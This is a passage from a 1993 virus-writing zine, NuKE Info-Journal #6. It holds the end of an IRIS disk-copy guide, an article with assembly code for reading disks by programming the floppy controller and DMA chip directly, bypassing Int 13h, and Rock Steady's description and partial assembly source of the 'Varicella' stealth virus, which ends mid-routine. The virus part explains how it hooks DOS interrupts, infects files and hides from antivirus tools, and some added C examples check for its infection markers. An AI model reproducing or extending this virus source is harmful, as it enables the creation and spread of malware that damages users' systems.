ADDRESS OF THE SOURCE BZUD : 0
COMPUTED VALUE OF SOURCE PHYU : 0
STARTING CYLINDER NUMBER : 0
BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0)
THIS IS NORMALY ZERO : 0
SOURCE CONTROLLER'S DEVICE CODE : 0
SOURCE DISC'S LRC : 0
NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL) : 0
ENTER THE FOLLOWING VALUES FOR THE DESTINATION:
ADDRESS OF THE DESTINATION BZUD : 0
COMPUTED VALUE OF DESTINATION PHYU : 0
STARTING CYLINDER : 0
BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0) : 0
DESTINATION CONTROLLER'S DEVICE CODE : 0
PRINT HERE OR $LPT (C/R OR $) : 0
RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND:
#SHUTDOWN <CTRL-E>[PASSWORD]<CTRL-E> BLOCKCOPY @73000,X73000
USE DBUG TO SET UP THE FOLLOWING LOCATIONS:
200 : 0
201 : 0
202 : 0
203 : 0
204 : 0
205 : 0
206 : 0
207 : 0
210 : 0
211 : 0
212 : 0
213 : 176346
PRESS RETURN WHEN READY TO GO ON 0
THEN J410 (OR RESET & START AT 410) TO START THE COPY
RULES FOR BLOCKCOPY:
ADDRESS FUNCTION
400 BAD HALT
401 NOT USED
402 NOT USED
410 START COPY
411 START VERIFY
412 START DISC PATTERN GENERATOR
413 START DISC PATTERN VERIFICATION
414 RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS
415 SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST
416 START INFINITE DISC PATTERN TEST
PRESS CR TO CONTINUE DISPLAY OF RULES
HALTS:
63077 INDICATES A SUCCESSFUL COMPLETION
63377 WRONG VALUE(S) IN TABLE STARTING AT 200
67077 READ ERROR
73077 WRITE ERROR
63277 VERIFY ERROR IN CORE COMPARE
ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS:
260 = CURRENT SOURCE RDA
261 = CURRENT DEST RDA
262 = CURRENT DISC STATUS
NO AUTOMATIC RETRIES ARE DONE.
ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415 (SEE ABOVE)
INTERACTIVE PROGRAM GUIDES
FOR IRIS CONFIGURATION AND SETUP
TOPIC # FOR INFORMATION ON:
1 BLOCKCOPY
THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER
THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO
MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE
SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'.
REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.
-=-
Also, you can edit individual text files and configuration files
with text editors. The names of this shit are different on all the systems
I've called.
-=-
% Conclusion %
~~~~~~~~~~~~~~
I hope this serves a useful purpose. I still can't understand why IRIS is
extremely easy to use and very common, yet I haven't seen any good
articles on it in a very long time.
================================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Programming the NEC765 Floppy Disk Controller, -N
E- and the DMA Chip to bypass the Int 13h Nu
-N uK
Nu By KE
uK Dr. X E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% The Challenge %
~~~~~~~~~~~~~~~~~
The challenge was started by Dr. X in order to try to access the disk media
without using any DOS or BIOS Interrupt 13h calls. Surely a _very_ difficult
challenge indeed; nevertheless Dr. X has succeeded in doing so, and he will
explain the theory behind his development. This scholar does deserve a
`pat on the back' for his brain teaser work. Good work Dr. X, and welcome
aboard.
NuKE Members/Supporters
% Programming the Floppy Disk Controller & DMA chip to bypass the Int 13h %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The NEC 765 floppy disk controller chip controls the floppy disk drives'
motors and heads, and it manages the flow of data to and from the disk sector(s).
The FDC (Floppy Disk Controller) performs 15 operations in all, of which
only three are discussed here: Seek, Read and Write.
The FDC operates in three phases:
1) The command phase
2) The execution phase
3) The result phase
a) The command phase : one or more bytes are sent to the Data Register
b) The execution phase: the FDC carries out the command
c) The result phase : a number of status byte(s) are read from the Data
Register
% I) The Ports %
The FDC is operated through only three I/O (Input/Output) ports:
3F2 - Digital Output Port
3F4 - Status Register
3F5 - Data Register
1. Digital Output Port (3F2)
Bits Function
1-0 Drive # ; 00=A, 01=B, 10=C, 11=D
2 0=Reset the floppy disk controller (***)
3 1=Enable FDC interrupt and DMA access
7-4 1=Turn ON drive motors D to A (bit 4 = drive A)
Warning: This register is WRITE ONLY
(***) Do not set bit 2 to 0 at any time (recelebrate)
2. Data Register (3F5)
Operation Byte # Function
Seek 1 Code number (Fh)
2 Head & Drive : 00000HDD (h=head, DD=drive)
Read Sector 1 Code number (66h)
2 Head & Drive : 00000HDD (h=head, DD=drive)
3 Track number
4 Head number
5 Sector number
6 Bytes in sector (2=512)
7 End of track (09)
8 GAP Length
9 Data Length
Write Sector 1 Code number (45h)
2-9 Same as READ SECTOR (above)
Warning: You must be sure that the FDC is ready before you send or read a
byte from the data register. Bits 7-6 of the status register
provide this information.
3. Status Register (3F4)
Bits Function
3-0 1=Disk drive D-A in Seek Mode
4 1=FDC read or write command in progress
5 1=FDC is not in DMA mode
6 1=FDC data register is ready to send data
0=FDC data register is ready to receive data
7 1=FDC ready to send or receive data
Warning: When a seek operation is complete, the FDC invokes an INT 6h
(the disk interrupt). When the interrupt occurs, the BIOS
interrupt handler sets bit 7 of the seek status byte in
the BIOS Data Area located at 0:043E. This is the sole result of
the interrupt.
% II) Initializing %
Before initializing a channel, the program must send a code to the chip
telling it whether it is reading from or writing to the Floppy Disk
Controller. This one byte code is 46h for reading and 4Ah for writing.
The code must be sent to each of two separate port addresses: 0E & 0C.
After that, you can send the parameters to the Data Register (3F5),
following the steps below:
1. Turn on the floppy disk (enable interrupts with an STI first)
a) Out the code byte to the Digital Output Register (3F2)
b) Send 46h to read or 4Ah to write to each of two separate port
addresses 0B and 0Ch
(eg: Out 0B,46h
Out 0C,46h)
2. Then you _must_ perform a seek operation to the concerned Head
and Track;
a) Out the code for Seek operation (0F) to the FDC (3F5)
b) Out head & Drive code (00000HDDxB, H=head,DD=drive)
c) Out the track number
d) Wait for Int 6h
3. After that you can perform the read or write operation(s):
a) Calculate the address of the buffer (see the program at the end
of this Article)
b) Send the address to the DMA
c) Out the value 66h for read or 45h for write to the FDC (3F5)
d) Out the Head & Drive number
e) Out the Track number
f) Out the Head number
g) Out the Sector number
h) Out the Sector Code; get this information with INT 21h
i) Out End-of-Track ; with AX=1E35h
j) Out the GAP length
k) Out the data length
l) Wait for INT 6h
m) Perform 7 INs from the Data Register (3F5) to get the status bytes.
(Refer to Part III)
4. Finally, turn off the motor(s):
a) Out the code byte to the Digital Output Register (3F2)
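To make the DMA part of steps 1b and 3a-3b concrete, here is an added C example (not Dr. X's code) that computes the page register and 16-bit address the 8237 channel 2 needs from a real-mode segment:offset, checks that the buffer does not straddle a 64K DMA page (a boundary the chip cannot cross on its own), and lists the port writes in order. Port numbers and the 46h mode byte are the page's; the 64K-page check and the sample addresses are added here.

```c
#include <stdbool.h>
#include <stdint.h>

/* One I/O port write, in the order the article's steps issue them. */
typedef struct { uint8_t port; uint8_t value; } port_write_t;

typedef struct {
    uint8_t  page;      /* A16-A19: written to channel-2 page register 81h */
    uint16_t address;   /* A0-A15: written low byte, then high byte, to port 04h */
    uint16_t count;     /* bytes - 1: written low, then high, to port 05h */
    bool     fits;      /* false when the buffer crosses a 64K DMA page */
} dma_setup_t;

/* Real-mode segment:offset to 20-bit linear address. Only the segment's
 * top nibble can reach the page register; the low 16 bits of (seg<<4)+off
 * form the address register (what the asm's Rol/And/Add sequence computes). */
uint32_t linear_address(uint16_t seg, uint16_t off) {
    return ((uint32_t)seg << 4) + off;
}

dma_setup_t dma_plan(uint16_t seg, uint16_t off, uint16_t nbytes) {
    dma_setup_t s = {0, 0, 0, false};
    if (nbytes == 0) return s;                     /* nothing to transfer */
    uint32_t first = linear_address(seg, off);
    uint32_t last  = first + nbytes - 1;
    s.page    = (uint8_t)((first >> 16) & 0x0F);
    s.address = (uint16_t)(first & 0xFFFF);
    s.count   = (uint16_t)(nbytes - 1);
    /* The 8237 increments only its 16-bit address register; the page
     * register stays fixed for the whole transfer, so a buffer straddling
     * a 64K boundary wraps back to the start of the same page and the
     * sector data lands on memory the caller never intended. */
    s.fits = ((first >> 16) == (last >> 16));
    return s;
}

/* Port writes for a channel-2 read (disk -> memory): mode byte 46h as on
 * the page (4Ah for a write). Returns the number of entries filled in. */
int dma_channel2_read_sequence(dma_setup_t s, port_write_t out[8]) {
    int n = 0;
    out[n++] = (port_write_t){0x0B, 0x46};                         /* mode register */
    out[n++] = (port_write_t){0x0C, 0x00};                         /* clear byte flip-flop */
    out[n++] = (port_write_t){0x04, (uint8_t)(s.address & 0xFF)};  /* address low */
    out[n++] = (port_write_t){0x04, (uint8_t)(s.address >> 8)};    /* address high */
    out[n++] = (port_write_t){0x81, s.page};                       /* page register */
    out[n++] = (port_write_t){0x05, (uint8_t)(s.count & 0xFF)};    /* count low */
    out[n++] = (port_write_t){0x05, (uint8_t)(s.count >> 8)};      /* count high */
    out[n++] = (port_write_t){0x0A, 0x02};                         /* unmask channel 2 */
    return n;
}
```

A buffer that fails the fits check should be moved (or the transfer split at the 64K boundary) before any of these writes are issued.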
% III) The Status Bytes %
After a read or write operation the FDC gives you 7 status bytes:
Byte # Function
1 Status Byte 0
2 Status Byte 1
3 Status Byte 2
4 Track number
5 Head number
6 Sector number
7 Byte per sector code (0-3)
1. Status Byte 0
Bit # Function
7-6 00=normal termination
01=execution began, could not complete
10=invalid command
11=failed because disk drive went offline
5 1=seek operation in progress
4 1=disk drive fault
3 1=disk drive not ready
2 number of selected head
1-0 number of selected drive
2. Status Byte 1
Bit # Function
7 1=requested sector beyond last sector number
6 always 0
5 1=data transfer error
4 1=data overrun
3 always 0
2 1=cannot read or find sector
1 1=cannot write because of write protection tab
0 1=missing address mark in disk format
3. Status Byte 2
Bit # Function
7 always 0
6 1=encountered delete-data address mark
5 1=CRC error in data
4 1=track identification problem
3 1=scan command condition satisfied
2 1=scan command condition NOT satisfied
1 1=bad track
0 1=missing address mark
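Decoding the seven result bytes by hand is error-prone, so here is an added C example (not the article's code) that turns them into a verdict using the ST0/ST1/ST2 bit tables above; the sample result-byte arrays used to exercise it are constructed, not captured from a drive.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

typedef enum {
    FDC_NORMAL = 0,        /* ST0 bits 7-6 = 00 */
    FDC_ABNORMAL = 1,      /* 01: execution began, could not complete */
    FDC_INVALID_CMD = 2,   /* 10: invalid command */
    FDC_DRIVE_OFFLINE = 3  /* 11: drive went offline */
} fdc_termination_t;

typedef struct {
    fdc_termination_t termination;
    uint8_t  drive, head;             /* ST0 bits 1-0 and bit 2 */
    bool     drive_fault, not_ready;  /* ST0 bits 4 and 3 */
    uint8_t  track, head_id, sector;  /* result bytes 4-6 */
    uint16_t bytes_per_sector;        /* 128 << size code (byte 7) */
    char     reasons[160];            /* ST1/ST2 flag names, comma-separated */
} fdc_result_t;

/* Flag names follow the page's ST1 and ST2 tables; NULL = 'always 0'. */
static const char *const st1_names[8] = {
    "missing address mark", "write protected", "cannot find sector", NULL,
    "data overrun", "data transfer error", NULL, "sector beyond end of track" };
static const char *const st2_names[8] = {
    "missing data address mark", "bad track", "scan not satisfied",
    "scan satisfied", "track id problem", "CRC error in data",
    "deleted-data address mark", NULL };

static void add_reason(fdc_result_t *r, const char *name) {
    size_t room = sizeof r->reasons - strlen(r->reasons) - 1;
    if (r->reasons[0]) { strncat(r->reasons, ", ", room); room -= 2; }
    strncat(r->reasons, name, room);
}

fdc_result_t fdc_decode_result(const uint8_t bytes[7]) {
    fdc_result_t r;
    memset(&r, 0, sizeof r);
    uint8_t st0 = bytes[0], st1 = bytes[1], st2 = bytes[2];
    r.termination = (fdc_termination_t)(st0 >> 6);
    r.head        = (st0 >> 2) & 1;
    r.drive       = st0 & 3;
    r.drive_fault = (st0 >> 4) & 1;
    r.not_ready   = (st0 >> 3) & 1;
    r.track = bytes[3]; r.head_id = bytes[4]; r.sector = bytes[5];
    r.bytes_per_sector = (uint16_t)(128u << (bytes[6] & 3));
    for (int b = 7; b >= 0; b--)
        if (((st1 >> b) & 1) && st1_names[b]) add_reason(&r, st1_names[b]);
    for (int b = 7; b >= 0; b--)
        if (((st2 >> b) & 1) && st2_names[b]) add_reason(&r, st2_names[b]);
    return r;
}

/* A transfer is only trustworthy when ST0 reports normal termination and
 * no ST1/ST2 error flag is raised. ST2 bits 3-2 (scan results) are status,
 * not errors, so they are masked out of the check. */
bool fdc_result_ok(const uint8_t bytes[7]) {
    fdc_result_t r = fdc_decode_result(bytes);
    return r.termination == FDC_NORMAL && !r.drive_fault && !r.not_ready
        && (bytes[1] & 0xB7) == 0 && (bytes[2] & 0x73) == 0;
}
```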
% IV) Read Procedure in ASM (for A86 assembler) %
Jmp TheCode
Buffer Db 512 dup (0) ; For the sector
StatusBuffer Db 7 Dup (7) ; For the status bytes
TheCode Proc Near
ReadSector:
; Turn ON the Motor
Sti
Mov Dx,03F2H
Mov Al,00101101xB ; Set bits 0, 2, 3, 5 (select drive B, no reset, DMA/IRQ on, motor B on)
Out Dx,Al
; Wait for motor to come to speed (1/2 second)
Call Motor_Delay
Mov Cx,2000
Loop $
; Begin the initialization of DMA Chip
Mov Al,46H ; Code for read (disk to memory)
Out 11,Al ; Send to DMA mode register (0Bh)
Out 12,Al ; Clear the byte flip-flop (0Ch)
; Now , Calculate buffer address
Lea Ax,Buffer ;
Mov Bx,Ds ;
Rol Bx,4 ;
Push Bx ;
And Bl,0FH ;
Mov Dl,Bl ;
Pop Bx ;
Add Ax,Bx ;
Jnc NoCarry ;
Inc Dl ;
NoCarry: ;
Dec Al ; justify
Out 4,Al ; Send Low Byte of adress to the DMA controller
Mov Al,Ah ;
Out 4,Al ; Send High byte of the adress // // // //
Mov Al,Dl ;
Out 81h,Al ; Send Page number (Page register)
; Finish initialization
Mov Ax,511 ;
Out 5,Al ; DMA controller
Mov Al,Ah ;
Out 5,Al ;
Mov Al,2 ;
Out 10,Al ; DMA controller
; Get pointer to disk base
Mov Al,1EH ;
Mov Ah,35H ;
Int 021H ;
; Send read parameters.
Mov Ah,066H ; Code for single sector read
Call Out_Fdc ; Send It
Mov Ah,2 ; Head&Drive #
Call Out_FDC ; Send It
Mov Ah,1 ; Track Number
Call Out_FDC ; Send It
Mov Ah,0 ; Head #
Call Out_FDC ; Send It
Mov Ah,3 ; Sector #
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+3 ; Sector Size code (2=512 bytes)
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+4 ; End-of-track #
Call Out_FDC ; Send It
Mov Ah,Es:[Bx]+5 ; Gap length
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+6 ; Data length
Call Out_FDC ; Send
Call Wait_Interrupt ; Wait Int 6
; Read the result bytes ..
Mov Cx,7
Lea Bx,StatusBuffer
Next:
Call In_FDC
Mov [BX],Al
Inc Bx
Loop Next
; Turn OFF the motor
Mov Dx,03F2H
Mov Al,00001101xB ; Turn Off the Drive B
Out Dx,Al
Ret ; Exit from the program
TheCode Endp
Wait_interrupt Proc
; Monitor the int 6 in bios status Byte
Mov Ax,40H
Mov Es,Ax
Mov Bx,3EH
Again:
Mov Dl,Es:[BX]
Test Dl,080H
Jz Again
And Dl,127 ; Clear bit 7 of the status byte we just read
Mov Es:[Bx],Dl ; and write it back, so the next wait blocks again
Ret
Wait_Interrupt EndP
Out_FDC proc near
Mov Dx,03F4H
Keep_Trying:
In Al,Dx
Test Al,128
Jz Keep_Trying
Inc Dx
Mov Al,Ah
Out Dx,Al
RET
Out_FDC EndP
In_FDC Proc Near
Mov Dx,03F4H
Keep_Trying2:
In Al,Dx
Test Al,128
Jz Keep_Trying2
Inc Dx
In Al,Dx
Ret
In_FDC EndP
Motor_Delay Proc
Mov Ah,15 ; Perform Seek Operation
Call Out_FDC ; Out
Mov Ah,2 ; Head&Drive
Call Out_FDC ; Out
Mov Ah,1 ; track#
Call Out_FDC ;
Call Wait_interrupt ;
Ret
Motor_Delay endp
--------------------------------------------------------------------------------
; The following is yet another example for reading the first few beginning tracks,
; but this one is for the Hard Disk
; By X
; Not `fully completed', but enough to get the point.
Jmp TheCode
Buffer Db 512 dup (0) ; For the sector
StatusBuffer Db 7 Dup (7) ; For the status bytes
TheCode Proc Near
ReadSector:
; Turn ON the Motor
Sti
Mov Dx,03F2H
Mov Al,00101101xB ; Set bits 0, 2, 3, 5 (select drive B, no reset, DMA/IRQ on, motor B on)
Out Dx,Al
; Wait for motor to come to speed (1/2 second)
Call Motor_Delay
Mov Cx,2000
Loop $
; Begin the initialization of DMA Chip
Mov Al,46H ; Code for read (disk to memory)
Out 11,Al ; Send to DMA mode register (0Bh)
Out 12,Al ; Clear the byte flip-flop (0Ch)
; Now , Calculate buffer address
Lea Ax,Buffer ;
Mov Bx,Ds ;
Rol Bx,4 ;
Push Bx ;
And Bl,0FH ;
Mov Dl,Bl ;
Pop Bx ;
Add Ax,Bx ;
Jnc NoCarry ;
Inc Dl ;
NoCarry: ;
Dec Al ; justify
Out 4,Al ; Send Low Byte of address to the DMA controller
Mov Al,Ah ;
Out 4,Al ; Send High byte of the address // // // //
Mov Al,Dl ;
Out 81h,Al ; Send Page number (Page register)
; Finish initialization
Mov Ax,511 ;
Out 5,Al ; DMA controller
Mov Al,Ah ;
Out 5,Al ;
Mov Al,2 ;
Out 10,Al ; DMA controller
; Get pointer to disk base
Mov Al,1EH ;
Mov Ah,35H ;
Int 021H ;
; Send read parameters.
Mov Ah,066H ; Code for single sector read
Call Out_Fdc ; Send It
Mov Ah,0 ; Head&Drive #
Call Out_FDC ; Send It
Mov Ah,12 ; Track Number
Call Out_FDC ; Send It
Mov Ah,0 ; Head #
Call Out_FDC ; Send It
Mov Ah,3 ; Sector #
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+3 ; Sector Size code (2=512 bytes)
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+4 ; End-of-track #
Call Out_FDC ; Send It
Mov Ah,Es:[Bx]+5 ; Gap length
Call Out_FDC ; Send it
Mov Ah,Es:[Bx]+6 ; Data length
Call Out_FDC ; Send
Call Wait_Interrupt ; Wait Int 6
; Read the result bytes ..
Mov Cx,7
Lea Bx,StatusBuffer
Next:
Call In_FDC
Mov [BX],Al
Inc Bx
Loop Next
; Turn OFF the motor
Mov Dx,03F2H
Mov Al,12
Out Dx,Al
Ret ; Exit from the program
TheCode Endp
Wait_interrupt Proc
; Monitor the int 6 in bios status Byte
Mov Ax,40H
Mov Es,Ax
Mov Bx,3EH
Again:
Mov Dl,Es:[BX]
Test Dl,080H
Jz Again
And Dl,127 ; Clear bit 7 of the status byte we just read
Mov Es:[Bx],Dl ; and write it back, so the next wait blocks again
Ret
Wait_Interrupt EndP
Out_FDC proc near
Mov Dx,03F4H
Keep_Trying:
In Al,Dx
Test Al,128
Jz Keep_Trying
Inc Dx
Mov Al,Ah
Out Dx,Al
RET
Out_FDC EndP
In_FDC Proc Near
Mov Dx,03F4H
Keep_Trying2:
In Al,Dx
Test Al,128
Jz Keep_Trying2
Inc Dx
In Al,Dx
Ret
In_FDC EndP
Motor_Delay Proc
Mov Ah,15 ; Perform Seek Operation
Call Out_FDC ; Out
Mov Ah,0 ; Head&Drive
Call Out_FDC ; Out
Mov Ah,12 ; track#
Call Out_FDC ;
Call Wait_interrupt ;
Ret
Motor_Delay endp
================================================================================
===============================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "The Varicella Virus Source Codes -N
E- Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
ahh, NuKE PoX viruses will never end... Well I noticed a few flaws and faults
in code in the old NuKE PoX virus version 2.0, which I wanted to refine. This
time I had a lot of time, and I _fully_ commented the source codes.
% Improvements %
The biggest improvement is the infection routine: I have created a generic
method that will always use the same infection/disinfection routine. If you
remember NuKE PoX v2.0, you noticed that I copied whole blocks of the code twice,
which gave the virus a size of 1800 bytes! This version hovers at 1483 bytes,
and it's far from tight, but it's EXTREMELY reliable! Meaning this baby should
never crash for any reason. And it has _many_ added features that N-Pox v2.0
didn't have!
% Introduction to the ideology of the Stealth Virus %
Like the SVC viruses, this virus will `disinfect' on the fly. And to the DIMWIT
that said SVC doesn't disinfect by rewriting the program on disk, GO CHECK YOUR
INFO NITWIT. The SVC viruses will disinfect a file when it is opened; the SVC virus
will actually remove the virus from the infected program. It will NOT attempt
a disinfection in memory only! It does have the ability to do this to a
certain extent: if you execute the file, and if you jump towards the end
of the file by Int21h/4202h, the SVC virus will fool DOS into thinking that the file
is not infected, when it really is. But this method has a MAJOR flaw, one
flaw is exercised by F-Prot anti-virus, to defeat this dumb method.
The major flaw is that these viruses _cannot_ keep track of file pointers; it
would take too much code to exercise this. So if you read a file from the
beginning and read sequentially toward the end, sure enough you will
encounter the SVC virus, because it does not have the ability to keep track
of the file pointer. So in order to fix this, SVC will do a _real_ disinfection
of the file on disk. Therefore in all aspects the file will look clean, as it
_is_ clean! Also note that the SVC viruses also infect system device drivers;
this is _rarely_ noted, maybe because people use VSUM as a reference?
% Varicella Features %
The virus will only infect .com and .exe generic files. I have removed the
.ovl infections because of certain crashes that persist with certain large
programs. No virus to date successfully does this for some reason.
The virus will hide its file length by FCB directory method (Int21h/ah=11h,12h)
and by File Handles method (Int21h/ah=4Eh,4Fh).
The virus will disinfect the file on opens & extended opens via
(Int21h/ah=3Fh,6Ch). The virus will also disinfect files as they are executed,
(Int21h/ah=4Bh) and will later reinfect it when it has terminated.
The virus will infect on closing (Int21h/ah=3Eh) and it uses the very
sophisticated Job File Table method (The List of List).
Infection is denoted by the seconds field being equal to the day of the month! This
method is _a lot_ better than setting the seconds field to 60 or 62, because many
AV programs flag on an invalid seconds field. Therefore now the seconds field will
be a number from 1->31 (days in a month), with only a 6% chance of an
invalid seconds field stamp. Also, in order not to create problems, the last two
bytes of the virus _must_ be DBh,DBh. Therefore the virus uses TWO methods of
detecting infection, because we wouldn't want to `disinfect' a file that isn't
infected, so we must be 100% sure.
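A defender's check for the two infection markers just described, written for this page as an added C example (not Rock Steady's code): it takes a file's DOS packed time and date words plus its last two bytes, the same data the virus's own stealth routines inspect, and reports whether both markers are present. The dos_time/dos_date helpers and the sample file bytes are constructed here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* DOS packed timestamp layout (FAT directory entry, as returned by
 * Int21h/57h or found in the DTA):
 *   time: bits 0-4 seconds/2, bits 5-10 minutes, bits 11-15 hours
 *   date: bits 0-4 day,       bits 5-8  month,   bits 9-15 year-1980 */
uint16_t dos_time(unsigned hour, unsigned min, unsigned sec) {
    return (uint16_t)((hour << 11) | (min << 5) | (sec / 2));
}
uint16_t dos_date(unsigned year, unsigned month, unsigned day) {
    return (uint16_t)(((year - 1980) << 9) | (month << 5) | day);
}

/* Marker 1: the virus compares the raw 5-bit seconds field with the raw
 * 5-bit day field (and ax,1fh / and cx,1fh / xor ax,cx in its stealth
 * routines). Days 30 and 31 give the 'invalid' seconds values 60 and 62
 * that the text says account for the ~6% of cases other AV tools flag. */
bool varicella_time_marker(uint16_t t, uint16_t d) {
    return (t & 0x1F) == (d & 0x1F);
}

/* The independent heuristic the text refers to: a seconds field above 29
 * (60 or 62 seconds) cannot come from a real clock. */
bool dos_seconds_invalid(uint16_t t) {
    return (t & 0x1F) > 29;
}

/* Marker 2: the virus body ends with the bytes DBh,DBh. */
bool varicella_trailer(const uint8_t *file, size_t len) {
    return len >= 2 && file[len - 2] == 0xDB && file[len - 1] == 0xDB;
}

typedef enum { VAR_CLEAN, VAR_TIME_ONLY, VAR_INFECTED } varicella_verdict_t;

/* Both markers must agree, just as the virus itself requires before it
 * will 'disinfect'; a timestamp match on its own is roughly a 1-in-32
 * coincidence and is reported separately rather than as an infection. */
varicella_verdict_t varicella_check(uint16_t t, uint16_t d,
                                    const uint8_t *file, size_t len) {
    bool tm = varicella_time_marker(t, d);
    bool tr = varicella_trailer(file, len);
    if (tm && tr) return VAR_INFECTED;
    if (tm)       return VAR_TIME_ONLY;
    return VAR_CLEAN;
}
```

Because the resident virus disinfects on open and hides the size in directory listings, these bytes and timestamps have to be read from a system booted clean for the check to mean anything.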
I found it no use to have a `fake' disinfection routine, whereby it fakes a
disinfection, for the reason that this method contains several flaws. And I
found that testing this virus on my PC with a 40 Meg MFM 65ms drive showed
_very_ little sign of abnormality. So speed-wise it's very fast; what is
1-2 milliseconds more (1/100s of a second)?
When disinfecting a file, the virus even puts back the original seconds field
time stamp, leaving absolutely no trace of its existence! How many viruses do
that? huh?
% To Come %
Well, I already have a multi-partition version of this virus; I'm currently
trying to add NED polymorphic possibilities to this virus. This will be a nice
task, as NED is variable in length, therefore I have to save the original
file length, or I will fix NED to be constant in length. Nevertheless you
should see it coming soon.
% About the Name %
Well, I didn't want to call this N-Pox, because it has NO code similarities
with N-Pox; the only thing they share is the method of going resident.
But I called this "Varicella" because Varicella is the medical term for
(Chicken Pox) that adults get! When a child gets the Pox, you call it Chicken
Pox; when an adult gets it, you call it Varicella! So I found it appropriate
to call this Varicella because it is perhaps the `adult' or later outcome
of the N-Pox virus. <hehe>
;=<VARICELL.ASM>================================================================
; (c) NuKE Software Development 1991, 1992, 1993
;
; VARICELLA VIRUS (Size 1483)
;
; By Rock Steady
;
; TASM VARICELL;
; TLINK/T VARICELL;
;
virus_size equ last - init_virus ;virus size (bytes)
mut1 equ 3
mut2 equ 1
mut3 equ 103h ;offset in memory
seg_a segment byte public
assume cs:seg_a,ds:seg_a
org 100h ;compile to .com
start: jmp init_virus
;-------------------------------------------------------------------------------
init_virus: call doit_now ;begin virus
doit_now: pop bp ;pop call offset
sub bp,offset doit_now ;fix it with pointer
push ax ;save registers
push ds
push es
mov ax,0abcdh ;check if virus is
int 13h ;alive in memory
jmp next_code1 ;force jump
virus_here: jmp exit_com ;error jump exit
next_code1: cmp bx,0abcdh ;cmp bx if virus alive
jnz install_virus
jmp virus_here ;yes, skip memory part
install_virus: push bx ;save registers
push cx
push dx
push si
push di
push ds
xor dx,dx ;0 value to dx
mov ds,dx ;put that in ds
les si,dword ptr ds:[0084h] ;get int21 vector
mov word ptr cs:[int21][bp],si ;save int21 offset
mov word ptr cs:[int21+2][bp],es ;save int21 segment
les si,dword ptr ds:[0070h] ;get int1c vector
mov word ptr cs:[int1c][bp],si ;save int1c offset
mov word ptr cs:[int1c+2][bp],es ;save int1c segment
les si,dword ptr ds:[004ch] ;get int13 vector
mov word ptr cs:[int13][bp],si ;save int13 offset
mov word ptr cs:[int13+2][bp],es ;save int13 segment
pop ds ;DS=PSP (.exe only)
push ds ;save DS
mov ax,ds ;ds=cx
dec ax ;dec cx, cx=mcb
mov es,ax ;es=cx, mcb
mov bx,es:mut1 ;bx=es:0003, mem size
mov dx,virus_size ;dx=virus size (bytes)
mov cl,4
shr dx,cl ;convert bytes to 16k
add dx,4 ;paragraphs + 1
mov cx,es ;cx=psp segment
sub bx,dx ;sub virus size from
inc cx ;new mem address
mov es,cx ;new segment
mov ah,4ah ;set the block size
int 21h
jc exit_mem
mov ah,48h
dec dx ;alloc the mem
mov bx,dx ;bx=# of para blocka
int 21h
jc exit_mem
dec ax ;new segment add
mov es,ax ;ax=es=mcb
mov cx,8h ;DOS is the owner
mov es:mut2,cx ;put it in mcb
sub ax,0fh
mov di,mut3 ;new offset to go
mov es,ax ;es=segment
mov si,bp ;add delta offset
add si,offset init_virus ;begining of virus
mov cx,virus_size ;our size
push cs ;get the correct
pop ds ;segment in ds
cld ;clear direction to +
repne movsb ;move us
mov ds,cx ;ds=0000
cli ;disable ints
mov word ptr ds:[0084h],offset int21_handler ;hook int21
mov word ptr ds:[0086h],es
mov word ptr ds:[0070h],offset int1c_handler ;hook int1c
mov word ptr ds:[0072h],es
mov word ptr ds:[004ch],offset int13_handler ;hook int13
mov word ptr ds:[004eh],es
sti ;enable ints
exit_mem: pop ds ;restore 'em
pop di
pop si
pop dx
pop cx
pop bx
exit_com: cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file?
je exit_exe_file ;yupe exit exe file
cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file?
je exit_exe_file ;yupe exit exe file
push cs ;fix cs=ds for .com
pop ds
mov bx,offset buffer ;get first 3 bytes
add bx,bp ;fix delta
mov ax,[bx] ;move first 2 bytes
mov word ptr ds:[100h],ax ;put em in the beginning
inc bx ;inc pointer
inc bx
mov al,[bx] ;get last of 3rd byte
mov byte ptr ds:[102h],al ;put that in place
pop es
pop ds
pop word ptr cs:[ax_reg][bp] ;save ax else where
mov ax,100h
push ax ;fake a CALL & RETN
mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal
retn ;link to 100h
exit_exe_file: mov dx,ds ;get psp=ds seg
add dx,10h ;add 16bytes to seg
pop es
pop ds
pop ax
add word ptr cs:[buffer+22][bp],dx ;fix segments
